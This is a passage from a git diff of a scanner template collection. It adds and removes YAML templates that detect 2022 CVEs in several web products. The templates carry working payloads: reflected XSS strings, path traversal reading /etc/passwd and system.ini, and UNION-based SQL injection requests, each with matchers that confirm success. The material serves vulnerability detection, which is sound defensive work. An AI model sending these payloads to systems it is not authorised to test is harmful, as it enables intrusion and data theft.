a victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: As a workaround, users may disable canonical tags in the root page settings. + reference: + - https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/ + - https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2 + - https://nvd.nist.gov/vuln/detail/CVE-2022-24899 + - https://contao.org/en/security-advisories/cross-site-scripting-via-canonical-url.html + - https://github.com/contao/contao/commit/199206849a87ddd0fa5cf674eb3c58292fd8366c + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-24899 + cwe-id: CWE-79 + epss-score: 0.00342 + epss-percentile: 0.70926 + cpe: cpe:2.3:a:contao:contao:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: contao + product: contao + shodan-query: title:"Contao" + tags: cve,cve2022,contao,xss,huntr + +http: + - method: GET + path: + - "{{BaseURL}}/contao/%22%3e%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"></script><script>alert(document.domain)</script>' + - '"Not authenticated"' + condition: and + + - type: word + part: header + words: + - text/html +# digest: 4b0a00483046022100dd79aa0474a89a2ac03e8147296d8958bd8863792570ee2d226ce4ef2bb5fe47022100f21bdc20c0df7169bf401f396d4d70048dddd98be918337c91d990bd543060b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-24900.yaml b/nuclei-templates/CVE-2022/cve-2022-24900.yaml new file mode 100644 index 0000000000..5197c4d2ea --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-24900.yaml @@ -0,0 +1,47 @@ +id: CVE-2022-24900 + +info: + name: Piano LED Visualizer 1.3 - Local File Inclusion + author: 0x_Akoko + severity: high + description: | + Piano LED Visualizer 1.3 and prior are vulnerable to local file inclusion. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server. + remediation: | + Apply the latest patch or update provided by the vendor to fix the local file inclusion vulnerability in the Piano LED Visualizer 1.3 application. + reference: + - https://github.com/onlaj/Piano-LED-Visualizer/issues/350 + - https://vuldb.com/?id.198714 + - https://nvd.nist.gov/vuln/detail/CVE-2022-24900 + - https://github.com/onlaj/Piano-LED-Visualizer/commit/3f10602323cd8184e1c69a76b815655597bf0ee5 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cve-id: CVE-2022-24900 + cwe-id: CWE-668,CWE-22 + epss-score: 0.00999 + epss-percentile: 0.81936 + cpe: cpe:2.3:a:piano_led_visualizer_project:piano_led_visualizer:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: piano_led_visualizer_project + product: piano_led_visualizer + tags: cve2022,cve,lfi,piano,iot,oss,piano_led_visualizer_project + +http: + - method: GET + path: + - "{{BaseURL}}/api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 +# digest: 4a0a004730450220769f0b22c82a753d0e8d77f012b14207ab4c56507605203f5ed415c7de1fcce0022100b0dfc7497219b96863930792f0fc57dd921a58d19ee3eccdbb2cbe6364059fc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-25216.yaml b/nuclei-templates/CVE-2022/cve-2022-25216.yaml new file mode 100644 index 0000000000..e76bdcc221 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-25216.yaml @@ -0,0 +1,49 @@ +id: CVE-2022-25216 + +info: + name: DVDFab 12 Player/PlayerFab - Local File Inclusion + author: 0x_Akoko + severity: high + description: DVDFab 12 Player/PlayerFab is susceptible to local file inclusion which allows a remote attacker to download any file on the Windows file system for which the user account running DVDFab 12 Player (recently renamed PlayerFab) has read-access. + impact: | + The vulnerability allows an attacker to include arbitrary local files, potentially leading to unauthorized access, information disclosure. + remediation: | + Apply the latest patch or update from the vendor to fix the vulnerability. + reference: + - https://www.tenable.com/security/research/tra-2022-07 + - https://nvd.nist.gov/vuln/detail/CVE-2022-25216 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/ARPSyndicate/cvemon + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-25216 + cwe-id: CWE-22 + epss-score: 0.01345 + epss-percentile: 0.85828 + cpe: cpe:2.3:a:dvdfab:12_player:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: dvdfab + product: 12_player + tags: cve,cve2022,dvdFab,lfi,lfr,tenable,dvdfab + +http: + - method: GET + path: + - "{{BaseURL}}/download/C%3a%2fwindows%2fsystem.ini" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + + - type: status + status: + - 200 +# digest: 490a0046304402203f6ae7c1e6a044dfb0d2128ba0584e801d970fb9556d08d9a0525a2a896768f502202d00ccb4c7597331865d1c3b386225396ccb8816353db36cda136dc03489c824:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-25323.yaml b/nuclei-templates/CVE-2022/cve-2022-25323.yaml new file mode 100644 index 0000000000..ebf9e285b9 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-25323.yaml @@ -0,0 +1,52 @@ +id: CVE-2022-25323 + +info: + name: ZEROF Web Server 2.0 - Cross-Site Scripting + author: pikpikcu + severity: medium + description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in ZEROF Web Server 2.0. + reference: + - https://github.com/awillix/research/blob/main/cve/CVE-2022-25323.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-25323 + - https://awillix.ru + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/awillix/research + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-25323 + cwe-id: CWE-79 + epss-score: 0.00115 + epss-percentile: 0.45093 + cpe: cpe:2.3:a:zerof:web_server:2.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: zerof + product: web_server + tags: cve,cve2022,xss,zerof + +http: + - method: GET + path: + - "{{BaseURL}}/admin.back<img%20src=x%20onerror=alert(document.domain)>" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'back<img src=x onerror=alert(document.domain)>' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 401 +# digest: 4a0a00473045022100e86147269d500eee87a76dc8b3d4d6b539f23c5c25293ad044322e223159453702203e3e862ec74768390d0b5445cfb478c43678e1e7109cd2e1d3f97e9bb17fdd90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-26135.yaml b/nuclei-templates/CVE-2022/cve-2022-26135.yaml deleted file mode 100644 index 6ec4be4593..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-26135.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2022-26135 - -info: - name: Full-Read Server Side Request Forgery in Mobile Plugin for Jira Data Center and Server - author: dk4trin - severity: high - description: A vulnerability in Mobile Plugin for Jira Data Center and Server allows a remote, authenticated user (including a user who joined via the sign-up feature) to perform a full read server-side request forgery via a batch endpoint. This affects Atlassian Jira Server and Data Center from version 8.0.0 before version 8.13.22, from version 8.14.0 before 8.20.10, from version 8.21.0 before 8.22.4. This also affects Jira Management Server and Data Center versions from version 4.0.0 before 4.13.22, from version 4.14.0 before 4.20.10 and from version 4.21.0 before 4.22.4. - reference: - - https://confluence.atlassian.com/jira/jira-server-security-advisory-29nd-june-2022-1142430667.html - - https://github.com/assetnote/jira-mobile-ssrf-exploit - classification: - cvss-score: 7.5 - cve-id: CVE-2020-14179 - tags: cve,cve2022,atlassian,jira,ssrf - -requests: - - method: GET - path: - - "{{BaseURL}}/secure/Signup!default.jspa" - - matchers-condition: and - matchers: - - type: word - words: - - "Email" - - "Username" - - "Password" - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/cve-2022-26159.yaml b/nuclei-templates/CVE-2022/cve-2022-26159.yaml deleted file mode 100644 index 0b91d2fb85..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-26159.yaml +++ /dev/null @@ -1,53 +0,0 @@ -id: CVE-2022-26159 - -info: - name: Ametys CMS Information Disclosure - author: Remi Gascou (podalirius) - severity: medium - description: Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages) via the auto-completion plugin, which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords. - impact: | - The vulnerability can lead to the exposure of sensitive data, such as user credentials or system configuration. - remediation: | - Apply the latest security patches or updates provided by the vendor to fix the information disclosure vulnerability in Ametys CMS. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-26159 - - https://podalirius.net/en/cves/2022-26159/ - - https://issues.ametys.org/browse/CMS-10973 - - https://github.com/p0dalirius/CVE-2022-26159-Ametys-Autocompletion-XML/ - - https://github.com/ARPSyndicate/cvemon - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2022-26159 - cwe-id: CWE-425 - epss-score: 0.00597 - epss-percentile: 0.76107 - cpe: cpe:2.3:a:ametys:ametys:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: ametys - product: ametys - tags: cve,cve2022,plugin,ametys,cms - -http: - - method: GET - path: - - '{{BaseURL}}/plugins/web/service/search/auto-completion/domain/en.xml?q=adm' - - matchers-condition: and - matchers: - - type: word - words: - - '<auto-completion>' - - '<item>' - condition: and - - - type: word - part: header - words: - - 'text/xml' - - - type: status - status: - - 200 -# digest: 4a0a00473045022100d8276e7109d2bd69d3ea42af14353f15d96864cf72e8e0effcef94a02a2a499b022032467aecf3198c0b7e34fa5664b2c75d91a03e94423d9d3168960d7a55e2bfa7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-27927.yaml b/nuclei-templates/CVE-2022/cve-2022-27927.yaml new file mode 100644 index 0000000000..1ff0eadb94 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-27927.yaml @@ -0,0 +1,52 @@ +id: CVE-2022-27927 + +info: + name: Microfinance Management System 1.0 - SQL Injection + author: lucasljm2001,ekrause + severity: critical + description: | + Microfinance Management System 1.0 is susceptible to SQL Injection. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Microfinance Management System 1.0. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27927 + - https://www.sourcecodester.com/sites/default/files/download/oretnom23/mims_0.zip + - https://www.exploit-db.com/exploits/50891 + - https://nvd.nist.gov/vuln/detail/CVE-2022-27927 + - https://www.sourcecodester.com/php/14822/microfinance-management-system.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-27927 + cwe-id: CWE-89 + epss-score: 0.10451 + epss-percentile: 0.94459 + cpe: cpe:2.3:a:microfinance_management_system_project:microfinance_management_system:1.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: microfinance_management_system_project + product: microfinance_management_system + tags: cve,cve2022,microfinance,edb,sqli,microfinance_management_system_project +variables: + num: "999999999" + +http: + - raw: + - | + GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5({{num}}),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' + + - type: status + status: + - 200 +# digest: 490a00463044022100f2330cc77d89bc9dfac599714252cb298c5cb445f575714fdaa3d22ce52302d0021f4591789a7daf3fbe297cb9f3ea7331553a85261ca6027546cac70619c403fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-28080.yaml b/nuclei-templates/CVE-2022/cve-2022-28080.yaml deleted file mode 100644 index 9076309976..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-28080.yaml +++ /dev/null @@ -1,82 +0,0 @@ -id: CVE-2022-28080 - -info: - name: Royal Event - SQL Injection - author: lucasljm2001,ekrause,ritikchaddha - severity: high - description: | - Royal Event is vulnerable to a SQL injection vulnerability. - impact: | - Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire database. - remediation: | - To remediate this vulnerability, input validation and parameterized queries should be implemented to prevent SQL Injection attacks. - reference: - - https://www.exploit-db.com/exploits/50934 - - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip - - https://github.com/erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated - - https://nvd.nist.gov/vuln/detail/CVE-2022-28080 - - https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2022-28080 - cwe-id: CWE-89 - epss-score: 0.01461 - epss-percentile: 0.86424 - cpe: cpe:2.3:a:event_management_system_project:event_management_system:1.0:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: event_management_system_project - product: event_management_system - tags: cve,cve2022,royalevent,edb,sqli,authenticated,cms,intrusive,event_management_system_project - -http: - - raw: - - | - POST /royal_event/ HTTP/1.1 - Host: {{Hostname}} - Content-Length: 353 - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD - - ------WebKitFormBoundaryCSxQll1eihcqgIgD - Content-Disposition: form-data; name="username" - - {{username}} - ------WebKitFormBoundaryCSxQll1eihcqgIgD - Content-Disposition: form-data; name="password" - - {{password}} - ------WebKitFormBoundaryCSxQll1eihcqgIgD - Content-Disposition: form-data; name="login" - - - ------WebKitFormBoundaryCSxQll1eihcqgIgD-- - - | - POST /royal_event/btndates_report.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD - - ------WebKitFormBoundaryFboH5ITu7DsGIGrD - Content-Disposition: form-data; name="todate" - - 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5("{{randstr}}"),0x1,0x2),NULL-- - - ------WebKitFormBoundaryFboH5ITu7DsGIGrD - Content-Disposition: form-data; name="search" - - 3 - ------WebKitFormBoundaryFboH5ITu7DsGIGrD - Content-Disposition: form-data; name="fromdate" - - 01/01/2011 - ------WebKitFormBoundaryFboH5ITu7DsGIGrD-- - - matchers-condition: and - matchers: - - type: word - words: - - '{{md5("{{randstr}}")}}' - - - type: status - status: - - 200 -# digest: 490a0046304402206f49180b6302f9fef0412af1682487a99e8e841803be35372ea552f7878da30e022034287c08d99ef3e984b6ba91845fc4b18462d620c01f5ea9326718da215d237f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-28365.yaml b/nuclei-templates/CVE-2022/cve-2022-28365.yaml deleted file mode 100644 index 36bde738a1..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-28365.yaml +++ /dev/null @@ -1,50 +0,0 @@ -id: CVE-2022-28365 - -info: - name: Reprise License Manager 14.2 - Information Disclosure - author: Akincibor - severity: medium - description: | - Reprise License Manager 14.2 is susceptible to information disclosure via a GET request to /goforms/rlminfo. No authentication is required. The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture and file/directory information. An attacker can possibly obtain further sensitive information, modify data, and/or execute unauthorized operations. - impact: | - An attacker can exploit this vulnerability to gain sensitive information. - remediation: | - Apply the latest security patch or upgrade to a non-vulnerable version of Reprise License Manager. - reference: - - https://www.reprisesoftware.com/products/software-license-management.php - - https://github.com/advisories/GHSA-4g2v-6x25-vr7p - - http://packetstormsecurity.com/files/166647/Reprise-License-Manager-14.2-Cross-Site-Scripting-Information-Disclosure.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-28365 - - https://www.reprisesoftware.com/RELEASE_NOTES - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2022-28365 - cwe-id: CWE-425 - epss-score: 0.00689 - epss-percentile: 0.77964 - cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: reprisesoftware - product: reprise_license_manager - tags: cve,cve2022,rlm,packetstorm,exposure,reprisesoftware - -http: - - method: GET - path: - - "{{BaseURL}}/goforms/rlminfo" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "RLM Version" - - "Platform type" - condition: and - - - type: status - status: - - 200 -# digest: 4a0a004730450221009238cd94d4ea391e4ba3a8fd9b6b9e4d2b1b35ea6b4618985cbd7679ba6c26aa022046b75d3e44aef88da8a1c3a43d4d2f499141f72031f265049c0993976f2531de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-29299.yaml b/nuclei-templates/CVE-2022/cve-2022-29299.yaml new file mode 100644 index 0000000000..d334a36759 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-29299.yaml @@ -0,0 +1,50 @@ +id: CVE-2022-29299 + +info: + name: SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting + author: For3stCo1d + severity: medium + description: | + SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'time_begin' parameter to Solar_History.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. + reference: + - https://www.exploit-db.com/exploits/50967 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29299 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cve-id: CVE-2022-29299 + epss-score: 0.00175 + epss-percentile: 0.53704 + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:-244067125 + tags: cve2022,cve,xss,solarview,edb + +http: + - method: GET + path: + - '{{BaseURL}}/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '<script>alert(document.domain)</script><"">' + - '/Solar_History.php" METHOD="post">' + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 4a0a004730450220673dc09a9e66945d3637df5b363f262144bea056b46b6df86841bfd376ae1c290221008cbc66ea88991d111c727cdec2f06797a521103da95bc92272406df8e87890a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-29301.yaml b/nuclei-templates/CVE-2022/cve-2022-29301.yaml deleted file mode 100644 index 9841826381..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-29301.yaml +++ /dev/null @@ -1,48 +0,0 @@ -id: CVE-2022-29301 - -info: - name: SolarView Compact 6.00 - 'pow' Cross-Site Scripting - author: For3stCo1d - severity: high - description: | - SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'pow' parameter to Solar_SlideSub.php. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. - remediation: | - Apply the latest patch or upgrade to a non-vulnerable version of SolarView Compact. - reference: - - https://www.exploit-db.com/exploits/50968 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29301 - - https://github.com/ARPSyndicate/cvemon - - https://github.com/ARPSyndicate/kenzer-templates - classification: - cve-id: CVE-2022-29301 - metadata: - verified: true - max-request: 1 - shodan-query: http.favicon.hash:-244067125 - tags: cve,cve2022,xss,solarview,edb - -http: - - method: GET - path: - - '{{BaseURL}}/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&bgcolor=green' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '<script>alert(document.domain)</script><"">' - - 'SolarView' - condition: and - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 -# digest: 4b0a00483046022100d38ffbd6542c292bb1f0cc27a0f800b5723872c60c562f22a60f1da6b998c8d5022100a20ec0c2ea61b699dd97b70ca196faf415a635099331772a14498dcbac2b3839:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-29548.yaml b/nuclei-templates/CVE-2022/cve-2022-29548.yaml deleted file mode 100644 index 5cdf4a3d75..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-29548.yaml +++ /dev/null @@ -1,55 +0,0 @@ -id: CVE-2022-29548 - -info: - name: WSO2 - Cross-Site Scripting - author: edoardottt - severity: medium - description: | - WSO2 contains a reflected cross-site scripting vulnerability in the Management Console of API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0, and 4.0.0; API Manager Analytics 2.2.0, 2.5.0, and 2.6.0; API Microgateway 2.2.0; Data Analytics Server 3.2.0; Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0; IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0; Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0; Identity Server Analytics 5.5.0 and 5.6.0; and WSO2 Micro Integrator 1.0.0. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. - remediation: | - Apply the latest security patches or updates provided by WSO2 to fix the XSS vulnerability. - reference: - - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1603 - - https://nvd.nist.gov/vuln/detail/CVE-2022-29548 - - http://packetstormsecurity.com/files/167587/WSO2-Management-Console-Cross-Site-Scripting.html - - https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2022/WSO2-2021-1603/ - - https://github.com/vishnusomank/GoXploitDB - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-29548 - cwe-id: CWE-79 - epss-score: 0.00299 - epss-percentile: 0.68867 - cpe: cpe:2.3:a:wso2:api_manager:2.2.0:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 1 - vendor: wso2 - product: api_manager - google-query: inurl:"carbon/admin/login" - tags: cve,cve2022,wso2,xss,packetstorm - -http: - - method: GET - path: - - "{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "CARBON.showWarningDialog('???');alert(document.domain)//???" - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 -# digest: 4a0a00473045022100f74f191103aed5a55a87b64ed54d8e3f2c3a84f48f2853428d9af571e0cd877702201a9a8a865260835250bcde79a6d3fd03166539ac2f673fd0a73386d219f510e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-30776.yaml b/nuclei-templates/CVE-2022/cve-2022-30776.yaml new file mode 100644 index 0000000000..f912a8432c --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-30776.yaml @@ -0,0 +1,55 @@ +id: CVE-2022-30776 + +info: + name: Atmail 6.5.0 - Cross-Site Scripting + author: 3th1c_yuk1 + severity: medium + description: | + Atmail 6.5.0 contains a cross-site scripting vulnerability via the index.php/admin/index/ 'error' parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest security patches or upgrade to a newer version of Atmail that addresses this vulnerability. + reference: + - https://medium.com/@bhattronit96/cve-2022-30776-cd34f977c2b9 + - https://www.atmail.com/ + - https://help.atmail.com/hc/en-us/sections/115003283988 + - https://nvd.nist.gov/vuln/detail/CVE-2022-30776 + - https://medium.com/%40bhattronit96/cve-2022-30776-cd34f977c2b9 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-30776 + cwe-id: CWE-79 + epss-score: 0.00112 + epss-percentile: 0.43631 + cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: atmail + product: atmail + shodan-query: http.html:"atmail" + tags: cve2022,cve,atmail,xss + +http: + - method: GET + path: + - "{{BaseURL}}/atmail/index.php/admin/index/?error=1%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Error: 1<script>alert(document.domain)</script>" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 4a0a0047304502210098e7e92637618d4c3c5540938565842f9d2479c1b7a7ca9a9333b2e0bf64a29b022077e0d1d54bd671842a9ba69fdbad1ed67e8c6f085c3235fde69b2d9e18009833:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-30777.yaml b/nuclei-templates/CVE-2022/cve-2022-30777.yaml deleted file mode 100644 index d36995911c..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-30777.yaml +++ /dev/null @@ -1,56 +0,0 @@ -id: CVE-2022-30777 - -info: - name: Parallels H-Sphere 3.6.1713 - Cross-Site Scripting - author: 3th1c_yuk1 - severity: medium - description: | - Parallels H-Sphere 3.6.1713 contains a cross-site scripting vulnerability via the index_en.php 'from' parameter. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. - remediation: | - Apply the latest security patch or upgrade to a newer version of Parallels H-Sphere to mitigate the XSS vulnerability. - reference: - - https://medium.com/@bhattronit96/cve-2022-30777-45725763ab59 - - https://en.wikipedia.org/wiki/H-Sphere - - https://nvd.nist.gov/vuln/detail/CVE-2022-30777 - - https://medium.com/%40bhattronit96/cve-2022-30777-45725763ab59 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-30777 - cwe-id: CWE-79 - epss-score: 0.00087 - epss-percentile: 0.36061 - cpe: cpe:2.3:a:parallels:h-sphere:3.6.2:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 2 - vendor: parallels - product: h-sphere - shodan-query: title:"h-sphere" - tags: cve,cve2022,parallels,hsphere,xss - -http: - - method: GET - path: - - '{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - '{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - stop-at-first-match: true - - matchers-condition: and - matchers: - - type: word - words: - - '<TITLE>"><script>alert(document.domain)</script>' - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 -# digest: 4a0a004730450220193f90816efc79d2ac468c37e58a42add449c9c53f48ed07934c74f756d9550d022100bc87714095325fe51d81827336aa365718a61f67c95e590fea50198ba245e3eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-32015.yaml b/nuclei-templates/CVE-2022/cve-2022-32015.yaml deleted file mode 100644 index 3fff028ab9..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-32015.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2022-32015 - -info: - name: Complete Online Job Search System 1.0 - SQL Injection - author: arafatansari - severity: high - description: | - Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/index.php?q=category&search=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. - remediation: | - Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Complete Online Job Search System 1.0. - reference: - - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-8.md - - https://nvd.nist.gov/vuln/detail/CVE-2022-32015 - - https://github.com/ARPSyndicate/kenzer-templates - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2022-32015 - cwe-id: CWE-89 - epss-score: 0.01426 - epss-percentile: 0.8625 - cpe: 